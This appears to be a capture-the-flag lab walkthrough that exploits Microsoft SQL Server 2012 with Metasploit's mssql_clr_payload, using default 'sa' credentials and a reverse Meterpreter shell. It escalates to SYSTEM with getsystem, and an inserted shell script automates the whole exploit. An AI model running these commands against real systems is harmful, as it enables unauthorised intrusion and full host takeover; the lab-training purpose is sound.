Disclaimer

The content of this article is for educational purposes only. Do not use the techniques described here on any system without the explicit consent of the owner.

We start with an nmap scan: a SYN scan of all TCP ports with service-version and OS detection (both -sS and -O need root).

nmap -sS -p- -sV -O target.ine.local

The host is a Windows machine exposing the usual services; the one that matters for this lab is Microsoft SQL Server, which nmap fingerprints as version 2012.

For the next steps we use Metasploit. Setting the target once with setg makes it a global option, so every module we load afterwards already has RHOSTS filled in (RHOST is set as well for modules that still refer to the option by its older name).

service postgresql start

msfconsole -q
setg RHOSTS target.ine.local
setg RHOST target.ine.local

Gain access to the MSSQLSERVER account on the target machine to retrieve the first flag.

Based on the nmap scan we know the target runs Microsoft SQL Server 2012, so we search Metasploit for modules that mention it.

search MSSQL 2012

The first result, exploit/windows/mssql/mssql_clr_payload, is the one we want. It authenticates to SQL Server, enables CLR integration and loads a .NET assembly that runs our payload in the context of the SQL Server service account. The module needs valid SQL credentials; nothing is set below, so the module defaults (USERNAME sa with an empty PASSWORD) are what gets sent, and in this lab they are accepted. Make sure LHOST points at your attacking interface before running it.

use exploit/windows/mssql/mssql_clr_payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run
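To make these steps repeatable, here is a small wrapper (an added example, not part of the original write-up) that writes the msfconsole commands used so far into a Metasploit resource script and runs it with msfconsole -r. The attacker address, the listener port and the reliance on the module's default SQL credentials (USERNAME sa, empty PASSWORD) are assumptions; change them to match your lab.

```shell
#!/bin/sh
# Added example: reproduce the msfconsole steps of this write-up non-interactively.
# Assumptions (not from the original page): the LHOST/LPORT defaults below, and that
# the target accepts the module's default SQL credentials (USERNAME sa, no password).
set -eu

TARGET="${TARGET:-target.ine.local}"
LHOST="${LHOST:-10.10.10.10}"    # assumed attacker IP; use your own interface address
LPORT="${LPORT:-4444}"
RC_FILE="${RC_FILE:-./mssql_clr.rc}"

# write_rc FILE: write a Metasploit resource script with the commands used above.
# Every line is a plain msfconsole command; `msfconsole -r` executes them in order.
write_rc() {
    out="$1"
    cat > "$out" <<EOF
setg RHOSTS ${TARGET}
setg RHOST ${TARGET}
use exploit/windows/mssql/mssql_clr_payload
set USERNAME sa
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST ${LHOST}
set LPORT ${LPORT}
run
EOF
}

# rc_option FILE NAME: print the value a resource script assigns to NAME
# (via set or setg), so the script can be sanity-checked before it is run.
rc_option() {
    awk -v name="$2" '($1 == "set" || $1 == "setg") && $2 == name { print $3 }' "$1"
}

write_rc "$RC_FILE"
echo "wrote $RC_FILE (RHOSTS=$(rc_option "$RC_FILE" RHOSTS), LHOST=$(rc_option "$RC_FILE" LHOST))"

# Start the database backend as in the write-up, then hand the script to msfconsole.
# Skipped when msfconsole is not installed so the file can still be inspected.
if command -v msfconsole >/dev/null 2>&1; then
    service postgresql start || true
    msfconsole -q -r "$RC_FILE"
else
    echo "msfconsole not found; resource script left at $RC_FILE" >&2
fi
```

Run it as root on the attacking box (LHOST=<your IP> sh mssql_clr.sh); when the handler catches the callback you land in the same Meterpreter session the interactive steps produce, and the shell and escalation steps that follow are unchanged.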

We get a Meterpreter session running as the SQL Server service account, which is the MSSQLSERVER account the task asks for. The first flag is in the root of the C: drive.

shell
cd \
type flag1.txt

Locate the second flag within the Windows configuration folder.

The folder in question is C:\Windows\System32\config, where the registry hives live. Trying to list it from the current shell fails with an access-denied error: the SQL Server service account has no read access there, so we need higher privileges first.

To get back to Meterpreter without losing the shell, press CTRL+Z to background the channel (CTRL+C would terminate it instead; either way you are back at the meterpreter prompt).

Next, we list the privileges held by the current process to look for a privilege-escalation path.

The account holds SeImpersonatePrivilege. Several of getsystem's techniques work by obtaining a SYSTEM token through a named pipe and impersonating it, which is exactly what this privilege allows, so Meterpreter can escalate on its own; afterwards getuid should report NT AUTHORITY\SYSTEM.

getprivs
getsystem

We can now go back into the shell, and the listing of the config folder that was refused before succeeds and reveals the second flag.

The third flag is also hidden within the system directory. Find it to uncover a hint for accessing the final flag.

There is no file named "flag3" in the System32 folder itself, but we can search the whole tree for any file whose name contains "flag" (the /s switch makes dir recurse into subdirectories).

dir *flag* /s

We find one text file containing the third flag. Its name, typos included, is the hint for the final flag: escalate privileges to read it, which we have already done with getsystem.

cd C:\Windows\System32\drivers\etc
type EscaltePrivilageToGetThisFlag.txt

Investigate the Administrator directory to find the fourth flag.

The last flag sits on the Administrator's Desktop, which is readable now that we are running as SYSTEM.

cd c:\Users\Administrator\Desktop
type flag4.txt

If you enjoyed this article, feel free to leave a clap and follow me for more content like this.

Let me know in the comments if you have any questions or doubts.

Happy hacking! 🧑‍💻